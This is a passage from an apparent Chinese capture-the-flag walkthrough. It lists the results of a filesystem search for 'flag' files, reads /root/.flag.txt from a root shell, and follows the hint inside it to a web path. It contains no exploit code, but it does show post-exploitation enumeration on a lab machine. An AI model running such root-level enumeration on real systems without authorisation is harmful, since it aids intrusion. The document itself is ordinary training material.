/usr/src/linux-headers-3.13.0-32/arch/microblaze/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/xtensa/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/tile/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/sparc/include/asm/irqflags_32.h
/usr/src/linux-headers-3.13.0-32/arch/sparc/include/asm/irqflags_64.h
/usr/src/linux-headers-3.13.0-32/arch/sparc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/ia64/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/arc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/mips/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/avr32/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/cris/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/cris/include/arch-v32/arch/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/cris/include/arch-v10/arch/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/m68k/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/blackfin/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/include/uapi/linux/kernel-page-flags.h
/usr/src/linux-headers-3.13.0-32/include/uapi/linux/tty_flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/page-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/pageblock-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/kernel-page-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/page-flags-layout.h
/usr/src/linux-headers-3.13.0-32/include/linux/page-debug-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/irqflags.h
/usr/src/linux-headers-3.13.0-32/include/trace/events/gfpflags.h
/usr/src/linux-headers-3.13.0-32/include/asm-generic/irqflags.h
/usr/src/linux-headers-3.13.0-32-generic/include/config/arch/hweight/cflags.h
/usr/src/linux-headers-3.13.0-32-generic/include/config/pageflags
/usr/src/linux-headers-3.13.0-32-generic/include/config/zone/dma/flag.h
/usr/src/linux-headers-3.13.0-32-generic/include/config/trace/irqflags
/usr/src/linux-headers-3.13.0-32-generic/include/linux/page-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/pageblock-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/kernel-page-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/page-flags-layout.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/page-debug-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/irqflags.h
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/proc/kpageflags
/proc/sys/kernel/acpi_video_flags
/var/www/html/006-final/x8vtfinal-flag.gif
/var/www/html/006-final/xvf7-flag
/var/www/html/gnocertdir/pix/i/unflagged.png
/var/www/html/gnocertdir/pix/i/flagged.png
/var/www/html/gnocertdir/question/flags.js
/var/www/html/gnocertdir/question/toggleflag.php
/var/www/html/gnocertdir/theme/afterburner/pix_core/i/unflagged.png
/var/www/html/gnocertdir/theme/afterburner/pix_core/i/flagged.png
/var/www/html/gnocertdir/theme/mymobile/pix_core/i/unflagged.png
/var/www/html/gnocertdir/theme/mymobile/pix_core/i/flagged.png
/var/www/html/gnocertdir/mod/quiz/pix/navflagged.png
/root/.flag.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/module/scsi_mod/parameters/default_dev_flags

发现有个flag.txt文件

cat 这个文件

1
2
3
4
5
6
7
8
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

访问/006-final/xvf7-flag/

image-20220826120826659